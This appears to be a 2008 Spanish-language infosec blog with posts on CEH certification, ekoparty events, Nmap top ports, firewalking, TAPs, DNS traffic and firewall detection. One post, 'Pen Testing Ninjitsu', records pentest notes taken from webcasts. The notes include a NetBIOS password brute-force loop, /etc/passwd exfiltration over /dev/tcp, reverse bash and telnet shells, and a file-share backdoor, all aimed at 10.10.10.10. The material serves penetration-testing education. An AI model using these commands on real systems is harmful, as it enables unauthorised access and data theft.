Durante el curso de 5 días, solo se cubre alrededor de un tercio de todos los módulos del CEH, el resto de los módulos son de Self Study. Esto es muy importante si tienen la intención de tomar el examen de certificación.

Todavía esta disponible la versión 5 del examen, y a partir de Noviembre solo se podrá tomar la versión 6. Mi consejo, si solamente necesitan tener la certificación, es que tomen la versión 5.

Una vez certificados, pueden renovar la certificación cada 2 años sumando puntos. Los puntos pueden obtenerlos muy sencillamente, cursos que hayan tomado, trabajos de seguridad, posts de seguridad en su blog, es muy fácil... solo van cargando todo esto en el portal de Ec-Council y no van a tener mayor problemas en la renovación.

Finalmente, una clave para un buen curso de CEH, es el instructor. Tomense un poco de tiempo para investigar quien es el instructor. El curso que tome la semana pasada lo dicto Hugo Lira, y debo decir que fue un excelente curso.

domingo, 7 de septiembre de 2008

DSP - 040908

Para los que se perdieron la Meeting del Jueves, aca les dejo algunas fotos.


Saludos para Cinic, Matias, APX y Vampii.

jueves, 4 de septiembre de 2008

Hoy DSP Meeting

Hoy, a partir de las 19hs, en Roots Bar (Bartolome Mitre 1745), realizaremos una nueva edición de la "Drunked Security Professionals" Meeting y están todos invitados.

La idea es contarles las novedades de la ekoparty, evacuar cualquier duda sobre las charlas y los trainings, y también pueden aprovechar para sacar su entrada al evento ;-)

Vamos a estar los organizadores, algunos de los speakers/trainers de la ekoparty anterior y de la de este año, y mucha gente que asistió al evento!


Esta foto la saco Ulises2k en el cierre del primer día de la ekoparty del año pasado, más fotos en su álbum.

miércoles, 3 de septiembre de 2008

Maldita MacBook

Lo impensado simplemente paso... el disco duro de mi MacBook murió y no hubo forma de poder rescatarlo.

Después de investigar un poco encontré que este es un problema común con las macbooks, no solo tienen el problema de que calientan mucho, sino que hubo una gran partida que salieron con el disco defectuoso.


Como la compré hace mas de un año y fuera de Argentina, me tuve que olvidar de la garantía. Otro disco de las mismas características, 160GB SATA, me costó 86USD en Galería Jardín.

Obviamente lo más grave fue la pérdida irrecuperable de los datos. Por suerte, tenía un backup completo de hace unas semanas atrás, pero igualmente perdí muchas cosas en las que estuve trabajando en este tiempo.

Es realmente increíble, uno esta comprando un producto de supuestamente mayor calidad y el disco se te muere de esta forma ???

Steve Jobs andate a la ^&%$#$%@#$^@#$

lunes, 1 de septiembre de 2008

Los Puertos Más Usados En Internet

Fyodor publicó su presentación de la Defcon, con los resultados del escaneo de puertos que le hicieron a toda la Internet.


Dentro de lo más interesante, podemos encontrar como optimizar Nmap para escanear grandes redes, y sin dudas lo mejor, el listado de los puertos más usados en Internet en la actualidad:

Top 10 TCP ports

- 80 (http)
- 23 (telnet)
- 22 (ssh)
- 443 (https)
- 3389 (ms-term-serv)
- 445 (microsoft-ds)
- 139 (netbios-ssn)
- 21 (ftp)
- 135 (msrpc)
- 25 (smtp)

Top 10 UDP ports

- 137 (netbios-sn)
- 161 (snmp)
- 1434 (ms-sql-m)
- 123 (ntp)
- 138 (netbios-dgm)
- 445 (microsoft-ds)
- 135 (msrpc)
- 67 (dhcps)
- 139 (netbios-ssn)
- 53 (dns)

Nmap tiene ahora su listado de puertos por default actualizado, y también tenemos la posibilidad de usar el comando "--top-ports XX" para escanear solo los primeros "XX" puertos mas usados.

Pero si realmente necesitamos escanear los puertos de un sistema, vamos a hacerlo por los 65535 puertos. Por esta razón, donde mas provecho vamos a sacar de este listado es en la etapa de discovery.

Como ya sabemos, el "Ping de Nmap" (ICMP Echo + TCP/80) no es demasiado efectivo, pero si armamos nuestro propio Ping, con los puertos TCP/UDP mas usados y diferentes pedidos ICMP, los resultados van a ser muy diferentes...

domingo, 31 de agosto de 2008

ekoparty @ WORK

Se acerca la ekoparty y cinco esclavos trabajan sin descanso para organizar la mejor conferencia latinoamericana de seguridad!

De izquierda a derecha los esclavos son, Juan Pablo Borgna, abajo Federico Kirschbaum, arriba estoy yo, luego el famoso Francisco Amato y finalmente Jeronimo Basaldua. Este año también contamos con la invalorable ayuda de Alexav8, que se fue antes de la foto, y Burbujita.

jueves, 28 de agosto de 2008

Ganadores de los Pwnie Awards 2008

Se publicaron los ganadores 2008 de los Pwnie Awards, el premio a los logros y fallos de la comunidad de seguridad, que fueron presentados en la última edición de la Black Hat.

Uno de los organizadores de los Pwnie Awards, Alexander Sotirov, dará una charla en la ekoparty llamada "Blackbox Reversing of XSS Filters".


martes, 26 de agosto de 2008

Pen Testing Ninjitsu

Hace unos días, Ed Skoudis presento la última parte de 3 webcasts sobre técnicas de PenTest que tituló Pen Testing Ninjitsu I, II y III.

Aquí les dejo algunas notas técnicas que fui tomando, los links para bajarse los webcasts, y de paso me gustaría pedirles dinero para ayudar a este señor :


# Resuelto Recientemente
"ipconfig /displaydns"

# Tabla ARP
"arp -a"

# Recursos Compartidos
"net use \\[targetIP] [password] /u:[user]"
"net use * \\[targetIP]\[share] [password] /u:[user]"
"/u:[MachineName]\[user]"
"net use \\[targetIP] /del"
"net use * /del"

# Ping Sweep
for /L %i in (1,1,255) do @ping -n 1 192.168.1.%i | find "Respuesta"

# DNS Lookups
for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i

# Brute Force con NetBIOS
for /f %i in (users.txt) do @(for /f %j in (pass.txt) do @echo %i:%j & @net use \\10.10.10.10 %j /u:%i 2>nul && echo %i:%j >> success.txt && net use \\10.10.10.10 /del)

# Hola Mundo de Linux a Windows
echo "hola mundo" > /dev/tcp/10.10.10.10/2222
nc -l -p 2222

# Transfiriendo archivos de Linux a Windows
cat /etc/passwd > /dev/tcp/10.10.10.10/2222
nc -l -p 2222

# Backdoor Reverso desde Linux
/bin/bash -i > /dev/tcp/10.10.10.10/2222 0<&1 2>&1
nc -l -p 2222

# Port Scanner desde Linea de Comando en Linux
port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/10.10.10.10/$port; [ $? == 0 ] && echo $port "abierto" >> /tmp/ports.txt; port=`expr $port + 1`; done

# Backdoors usando Telnets Reversos en Linux
telnet 10.10.10.10 2222 | /bin/bash | telnet 10.10.10.10 3333
nc -l -p 2222 (aca se ingresan los comandos)
nc -l -p 3333 (aca sale la respuesta)

# Port Scanner en Windows
for /L %i in (1,1,1024) do telnet 10.10.10.10 %i
(cuando encuentra puerto abierto se cuelga, CTRL-[ y quit)

# Port Scanner en Windows usando el Cliente FTP
for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.t 2>>ports.txt

# Transferencia de Archivos en Windows
echo hola-mundo > \\10.10.10.10\temp\archivo.txt
type c:\temp\archivo.txt

# Backdoor en Windows usando File Shell
for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
echo ipconfig > \\10.10.10.10\temp\commands.txt (feed de comandos)
type \\10.10.10.10\temp\output.txt (salida)

Me tome todo este trabajo porque se que después me va a resultar mucho mas fácil venir a buscarlo al blog ;-)

Se pueden bajar los webcasts desde aquí: Parte 1, Parte 2, Parte 3.

jueves, 21 de agosto de 2008

Firewalking 1998-2008

El Firewalking es una interesante técnica creada en 1998 por Goldsmith y Schiffman, con el objetivo de mapear la política de filtrado de un firewall. Diez años después, ¿ todavía funciona esta técnica ?


¿ cómo trabaja el firewalking ?

Básicamente, vamos a realizar un escaneo de puertos con una TTL fija que debe expirar en el último gateway antes de llegar a nuestro objetivo.

Si el paquete expira, recibiremos un mensaje de error ICMP time exceed in-transit, lo que nos estará indicando que el paquete supero la barrera de filtrado pero no llego al objetivo ya que la TTL llego a 0. Si no recibimos ninguna respuesta significa que el paquete fue descartado por el firewall ya que no cumplía con la política de filtrado.

¿ cuál es la diferencia con un escaneo de puertos ?

En un escaneo de puertos solo podemos estar seguros de las respuestas que recibimos, por ejemplo si recibimos un SYN/ACK el puerto esta abierto, o si recibimos un RST el puerto esta cerrado, pero si no recibimos nada, ¿ significa que efectivamente el puerto esta filtrado ? no, también pueden estar pasando muchas otras cosas.

Pero el firewalking se vuelve sumamente efectivo cuando escaneamos puertos UDP o hacemos un escaneo de protocolos, en donde generalmente no vamos a recibir respuestas.

¿ todavía funciona esta técnica ?

Para la época en la que fue concebida esta técnica, los firewalls eran muy básicos por lo que el firewalking era bastante efectivo. La mayoría de los firewalls modernos ya no decrementan la TTL de los paquetes, por lo que el firewalking solo es efectivo si entre nuestro objetivo y el firewall hay un router.

Igualmente, todavía podemos encontrar muchas redes con packet filters o que tienen varias DMZ's con router's en el medio, por lo que la diversión todavía no termino ;-)

A modo de Nota Mental, para hacer un Firewalking con Scapy, primero hay que utilizar traceroute() para obtener la TTL del último gateway, y luego las siguientes funciones para hacer el firewalking y graficar los resultados:



res,unans = sr(IP(dst=TARGET, ttl=GWTTL)/TCP(dport=[PUERTOS]), timeout=2, retry=-2)

res.make_table(lambda (s,r):(s.dst, s.dport, r.sprintf("{TCP:%TCP.flags%}{ICMP:%IP.src%#%r,ICMP.type%}")))

lunes, 18 de agosto de 2008

SANS Desafía a los CEH

Hace unos días, SANS lanzo un desafío para certificados en CEH que deseen probar sus conocimientos frente a GPEN (GIAC Penetration Tester), la nueva certificación de SANS. Me anote y entre al desafío :-)


Realmente me sorprendió tener la posibilidad de participar, ya que el desafío era para los primeros 50 CEH que se registren, y generalmente para este tipo de promociones se anotan cientos de personas.

GPEN es una certificación altamente técnica de Penetration Testing creada por el mítico Ed Skoudis en persona, y el costo para tomar el examen es de 900 USD.

Que solo se haya invitado a certificados en CEH, me hace pensar que el examen es muy difícil y el objetivo podría ser tener una estadística marketinera del tipo "el 90% de los CEH no pudo aprobar esta certificación"...

Los que entramos en el desafío no tenemos que pagar nada, pero tampoco tenemos acceso al curso ni tampoco a cualquier tipo de material de apoyo, la única guía disponible es el temario del curso.

En principio hay tiempo hasta Diciembre para tomar el examen, así que recién voy a comenzar a estudiar después de la ekoparty, vamos a ver como me va... ;-)

sábado, 16 de agosto de 2008

¿ Qué es un TAP ?

Un TAP o "Test Access Port" es un dispositivo de red diseñado para capturar tráfico. Generalmente son usados por aplicaciones de seguridad debido a que son no-intrusivos, no-detectables, soportan full-duplex y dejan pasar el tráfico aunque hayan perdido la energía.

Pero repasemos brevemente cuales son los métodos mas usuales utilizados para capturar tráfico:

- HUB: estos son los mas populares para realizar capturas ya que replican todo el tráfico en todos los puertos. La desventaja es que son half-duplex, y muchos de los hubs fabricados recientemente en realidad trabajan como switches.

- SPAN: Switched Port Analyzer, también conocido como Port Mirroring, nos permitirá replicar el tráfico de un puerto del Switch a otro en donde tenemos el sniffer. La desventaja es que si queremos capturar el tráfico de mas de un puerto vamos a perder paquetes, ya que el switch no esta diseñado para esta tarea y le dará prioridad al switching.

Finalmente llegamos a los TAPs. Por ejemplo, en el caso de que queramos capturar todo el tráfico de Internet, deberíamos poner al TAP entre nuestro border router y el firewall.

Los TAPs mas básicos, poseen cuatro puertos, osea que para nuestro ejemplo deberíamos destinar un puerto al router, otro al firewall, y los dos puertos restantes son para la captura de tráfico.

De los dos puertos destinados para la captura, un puerto captura el tráfico de ida, mientras que el otro puerto captura el tráfico de vuelta, por lo que necesitaríamos dos computadoras para poder capturar los dos flujos de tráfico.

Los TAPs que trabajan de esta forma se conocen como "no-agregados" porque tienen la complejidad de que luego hay que unir las dos capturas en un único archivo, pero también son los mas económicos como el que vemos a continuación:


Obviamente también existen los TAPs "agregados", que a través de cada puerto de monitoreo que posean, nos proveerán de los dos flujos de tráfico ya unidos. Claro que el precio de estos equipos aumentan considerablemente:




Estos TAPs pertenecen a NetOptics, pero podemos encontrar muchos otros fabricantes.

miércoles, 13 de agosto de 2008

Analizando Tráfico DNS

Una forma de entender como funciona un protocolo, es utilizar herramientas y analizar el tráfico que estas generan. A continuación vamos a ver algunos simples ejemplos para entender como trabaja el protocolo DNS.

Vamos a utilizar el comando "host" de Linux/Unix, para solicitar mediante los parámetros "-t ns", el listado de los servidores de nombres correspondiente al dominio "amazon.com".


Si analizamos esta captura, podemos ver que DNS utiliza como protocolo de transporte UDP en el puerto 53:


Generalmente DNS va a utilizar UDP, pero podemos decirle a "host" que realice el pedido utilizando TCP. Esto lo podemos hacer con la opción "-T" de esta forma: "host -T -t ns amazon.com"

A menos que forcemos a "host" a utilizar TCP, DNS va a utilizar este protocolo con un cliente solamente cuando la respuesta a un pedido supere los 512 bytes.

Por ejemplo, veamos este ejemplo en donde solicitamos los registros ANY de amazon.com:


Podemos ver que como la respuesta supero los 512 bytes, aparece un error ";; Truncated, retrying in TCP mode". Analicemos el tráfico:


Al principio, podemos ver que los dos primeros paquetes son UDP, como la respuesta supera los 512 bytes, se volverá a realizar toda la transacción utilizando TCP. Después de los paquetes UDP, se pueden ver los tres paquetes del 3-way handshaking de TCP, la respuesta del servidor y finalmente los FIN, ACK para finalizar la conexión.

El único caso en el que DNS siempre utilizará TCP, es cuando un servidor de nombres le solicite a otro una transferencia de zonas. También podemos solicitar una transferencia de zonas con el comando "host -l", pero esto solo debería ser posible entre servidores de nombres.

En mi COMBAT Training veremos muchas cosas más sobre DNS que luego iré posteando en el Blog ;-)

martes, 12 de agosto de 2008

Abierta la Registración para ekoparty 2008

Ya se encuentra abierta la registración para la conferencia y los trainings de la edicicón 2008 de la ekoparty.


En la primera ronda de selección (todavía falta la segunda), ya están confirmados las siguientes charlas para la conferencia:

- Keynote: Hacking Has An Economy of Scale, by Dave Aitel
- Debian's OpenSSL random number generator Bug, by Luciano Bello & Maximiliano Bertacchini
- SAP Security - PenTest It, Secure It!, by Mariano Nuñez Di Croce
- Smartphones (in)security, by Nicolas Economou & Alfredo Ortega
- Code Injection On Virtual Machines, by Nicolas Economou
- In-depth Anti-Forensics - Challenges of Steganography on Discovering Hidden Data, by Domingo Montanaro
- Atacando RSA mediante un nuevo método de factorización de enteros, by Hugo Scolnik
- Adobe javascript al descubierto, by Pablo Solé

También ya se pueden inscribir a cualquiera de los siguientes trainings (cupos limitados):

- Descubrimiento y Explotación de Vulnerabilidades Web, by Andrés Riancho (CYBSEC)
- Unethical Hacking, by Pablo Solé (IMMUNITY)
- Stack Overflows, by Damian Gomez (IMMUNITY)
- Hacking and Defending Oracle Databases, by Esteban Martínez Fayó (ARGENISS)
- Network Security COMBAT Training, by Leonardo Pigñer

Links importantes:
- Programa de la ekoparty 2008
- Registración para la ekoparty 2008

Consultas a: organizacion@ekoparty.com.ar

domingo, 10 de agosto de 2008

¿ Dónde están los Type11Code0 ?

Buscando algunos buenos ejemplos de firewalking para mi COMBAT Training, me encontré con unas respuestas muy curiosas de mi ISP cuando enviaba paquetes con una TTL muy baja.

Por ejemplo, haciendo un traceroute con ICMP o UDP pueden ver que casi inmediatamente aparecen varios saltos filtrados:


Ahora si al traceroute lo hacemos con TCP, lo sumamente curioso es que esos saltos siguen apareciendo como filtrados, pero al sniffear el tráfico podemos ver que en realidad estamos recibiendo un TCP RST por cada paquete que enviamos:



Lo raro es que cuando la TTL de un paquete llega a 0, deberíamos recibir un mensaje de error ICMP Time exceeded in-transit (ICMP Type 11 Code 0), no un TCP RST. Tengan en cuenta que estos de valores de TTL van de 1 a 6, osea que estamos muy lejos de llegar al host todavía.

Probé realizar las mismas pruebas desde otro enlace a Internet y esto no sucede, por lo que podríamos pensar que es algún dispositivo de red que posee mi ISP.

Para intentar identificar a este dispositivo podemos probar hacer un fingerprinting pasivo con p0f. El tema es que la exactitud que puede llegar a tener p0f esta basada en el análisis de paquetes SYN/ACK, cuando intentamos hacer un fongerprinting con paquetes RST, p0f se encuentra con grandes limitaciones:


Mi teoría es que podría llegar a ser algún dispositivo de QoS, ya que a los RST solo los recibimos cuando usamos TCP, aparte la TTL de 255 suelen ser usadas por equipos de este tipo.

Pero como estuve todo el fin de semana con una fuerte gripe, tengo fiebre y mientras escribo este post Gesolmina me quiere hacer entender el dialecto greco-calabres, tal vez todo sea fruto de mi imaginación conspirativa.

Si a alguien tiene alguna otra idea sobre que podría llegar a ser este dispositivo por favor deje algún comentario.

jueves, 7 de agosto de 2008

30 Días de Ataques a los DNS

Clarified Networks realizo una excelente animación del progreso de corrección de los servidores DNS de todo el mundo a partir del análisis de tráfico real.

Pasando por rojo, amarillo y verde, se puede ver como fue cambiando el nivel de vulnerabilidad de los DNS de todo el mundo en casi un mes.



Kaminsky publicó los slides de su presentación en la Black Hat en su sitio web, y la gente de Arbor Networks hizo un excelente post en su blog sobre ataques a DNS en los últimos 30 días.

lunes, 4 de agosto de 2008

sábado, 2 de agosto de 2008

Técnicas Para Descubrir Firewalls

Descubrir la presencia de un firewall, y lograr identificarlo, puede ayudarnos a comprender como esta armada la topología de red para poder encontrar sus puntos débiles.


A modo de nota mental, voy a listar algunas técnicas conocidas que podemos utilizar para descubrir firewalls. Estas técnicas pueden estar condicionadas a si el firewall es stateful o packet filter.

Traceroute con TCP. Generalmente la politica del firewall va a filtrar protocolos como ICMP o UDP, utilizados por las implementaciones comunes de traceroute, pero si hacemos un traceroute con TCP (u otros protocolos) muchas veces vamos a poder descubrir la IP del firewall. Mas info en este post.

Fingerprinting del SO. En teoría un firewall no debería tener puertos abiertos o cerrados, todos deberían estar en estado filtrado, por lo que un fingerprinting debería ser difícil de realizar, pero muchas veces funciona.

Puertos Propietarios. Hay firewalls que utilizan algunos puertos específicos para brindar un servicio en particular. Por ejemplo, CheckPoint Firewall-1 utiliza los puertos 259 y 900 para autenticar usuarios que quieren acceder a un recurso.

IKE Scanning. Muchos firewalls, también brindan el servicio de VPN, por lo que si escaneamos por el protocolo IKE vamos a poder descubrir muchos firewalls y servidores de VPN. También podríamos escanear por el puerto 500, pero buscar por IKE funciona muy bien.

Analizar los Paquetes. La mayoría de los firewalls, aparte de descartar una conexión, también tienen la capacidad de terminar una conexión utilizando un RST. En los flags de los headers IP y TCP de estos paquetes, hay grandes diferencias que nos permitirían diferenciar a un firewall de otro.

Generar Respuestas. Otra técnica podría ser enviarle al firewall paquetes malformados para obligarlo a que nos envíe algún tipo de respuesta que delate su presencia. Un buen firewall no debería responder a ningún paquete extraño, pero hay packet filters a los que si por ejemplo les enviamos paquetes con un CRC erróneo van a respondernos (Ed3f).

Ataques Bloqueados. Los firewalls modernos suelen traer alguna capacidad para funcionar como IDS/IPS, analizar que ataques son bloqueados y cuales no, podría también permitirnos identificar que firewall se esta utilizando.

No se me ocurre nada mas en este momento, si me estoy olvidando de algo por favor dejen algún comentario.

LinkWithin